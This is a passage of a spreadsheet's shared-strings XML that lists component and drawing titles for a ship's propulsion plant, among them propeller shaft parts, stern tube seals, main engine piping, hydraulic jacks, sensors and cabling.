    <t>Servo oil pipe, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dividing pipe, intermediate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller hub and blades assemb.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller shaft arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Disc for pitch control rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Liner for propeller shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Raw pipe for liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Marking of shaft arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing alarm</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piping for stern tube seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub lubricating oil system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installation guidance</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lantern ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Threaded bush</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Machining of boss and bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube, installation parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rubber stave bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Paint specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw for stuffing box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe for seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cu bushing for cable pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conical guard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welding flange, machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover pipe, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Telescopic pipe, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover/telescopic pipe, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2-parted guard w. alignment ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing installation parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Venting pipe for aft seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr. manual, stern tube seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reduction nipple muff</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube seals</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compac bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Single plain key</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate shaft arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter flange for tunnel PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate shaft, assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Machining of fitted holes/bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. for temperatur sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Install. parts, bearing alarm</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible hoses for HPU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Design information</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft container, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting flange, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Container for coupling flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Container with coupling flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drilling coordinates</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling water pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INCOMPLETE_DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Transport foundation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Resilient mounting element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Single bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Twin bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr.guide for elastic mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Brake bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welded brake bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support for shaft brake</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Brake pad</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bolt set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power unit &amp; brake blok</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steel foundation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft blocking, hydr. disc brake</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft blocking, hydr. aggregate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Placement of engine plant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Curved tooth coupling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexible clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Freshwater system preheater</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe outlet preheater</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installation part or loose sup.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction manuals</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft alternator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Start transformer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Voltage rheostat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing for alternator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotating rectifier</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AVR voltage regulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Step-up gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reduction gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front end gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pulleys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reaming of PTO and hub</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blank hub for PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO intermediate shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO shaft bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting power take off</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft sealing assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub for flexible coupling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Short engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Anode for oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thruster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bow thruster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Remote control system FPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Remote control system CPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lay-out, main bridge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lay-out, engine control room</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Joystick system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Telegraph system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Motor starter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Motor starter, high press. pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manoeuvre printer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotating lamp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Siren</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Data and documents</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Recommendation documents</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine, connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine, hydraulic pump station</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine, control eq. aux. Blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine, hydraulic filter unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine, shaft line</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine, gaskets sealings o-rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, engine data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, lub. and cool. oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, cam. lubrication</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, cyl. lubrication</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, cooling seawater</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, cooling jacket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, cooling central</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, fuel oil system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, compressed air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, scavenge air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, air cooler cleaning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, exhaust pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, torsiograph arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, shaft earth. device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, fire ext. scav. Air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, engine seating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, shaft line</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine room, EL ER/ECR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Outline dimention main tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Class Approved Documents</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bedplate, cutting plans</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main Bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Journal Bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Frame box, cutting plans</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Frame box, machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BWM System, cable tray</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder frame, misc. parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust bearing, misc. parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Additional mass on guide shoes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compression shim</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TVD, oil piping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Moment compensator wheels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Moment compensator, oil piping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling Jacket. Protect. Shield</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling jacket and cyl. liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft housing and baseplate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arrangement of reversing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel &amp; exhaust gear, misc. parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Enclosure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Starting valve, cylinder cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel valve nozzle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High pressure pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricator, Mechanical cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Injectors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Software, ALCU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Upper exh. side, Various pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger, various pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger, water washing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Starting air piping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air cooler, cooling water pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air cooler, cleaning inlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air cooler, drain pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil pipe, inlet - outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil pipe, heating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Jacket cooling water, outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Jacket cooling water, inlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Jacket cooling water, drain pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder frame, various pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stuffing box, drain pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder cover, various pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scav. air, drain pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scav. air, fire exting.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Water Mist Catcher, drain pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder lubricating pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder lub. oil booster unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust valve, lub. oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust valve, air spring pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>System oil inlet, lub. oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main bearing, lub. oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust bearing, lub. oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust actuator, lub. oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft, lub. oil pipe inlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft, lub. oil pipe outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Venting pipe, engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic oil pipe, inlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic oil pipe, outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control and safety air, pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of non-return valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">By-pass system </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger outlet pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gall. brackets, top</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gall. brackets, upp. man.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gall. brackets, cent. Man</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gall. brackets, low. Man</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gall. brackets, upp. exh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gall. brackets, cent. exh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gall. brackets, low. exh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Platform arr., top</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Platform arr., cent. man.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Platform arr., low. man.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Platform arr., cent. exh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Platform arr., low. exh.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power Take Off (PTO)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbo Compound System (TCS)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Governor system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine side control stand</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manoeuvring system unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manoeuvring handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALCU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instrumentation, alarm - safety</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instrumentation, CoCoS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder liner, wall tempature</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CoCoS, MMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Torsion Vibration Monitor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Water In Lub. Oil Monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger tacho system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main bearing supervision</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder unit, tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crosshead and conn rod, tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Optional, tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder cover, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston crown, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston rod, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connecting rod, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crosshead end, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide planes, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tuning wheel, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turning wheel, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AVD, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Segment stopper, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Counter weight, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Torsion damper, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Chain tightener, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate shaft, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft bearing, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main Hydr. Pipe, Hydr. Jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Moment Compensator, Hydr. Jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust spindle, hydr. Jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust valve, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exh. valve actuator, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HPU block, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HCU block, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel Pump, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Complete Set, hydr. jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hold. Down, Hydr. Jacks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spare Parts, Class Specified</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Structural Parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulics</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Electronics </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Cylinder Liner </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crosshead with Connection Rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankshaft, Thrust Bearing and Turning Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Control Gear </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Fuel Oil System </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Turbocharger System </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction Manual Misc. Docs</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Description&amp;Maintenance Schedule</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing upper part casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing lower part casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Speciel tools f. prod.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alignment data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING SYSTEM, CENTRAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Difference transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressurestat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Difference pressurestat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust gas temperature sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing temperature sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dual pitch transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Encoder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Impulse strip</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Leakage oil sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Twisted cable</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power cable</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable marking</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wire marking</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Heat shrinkable sleeving</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shielding jacket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER FOR CABLE TIE</t>
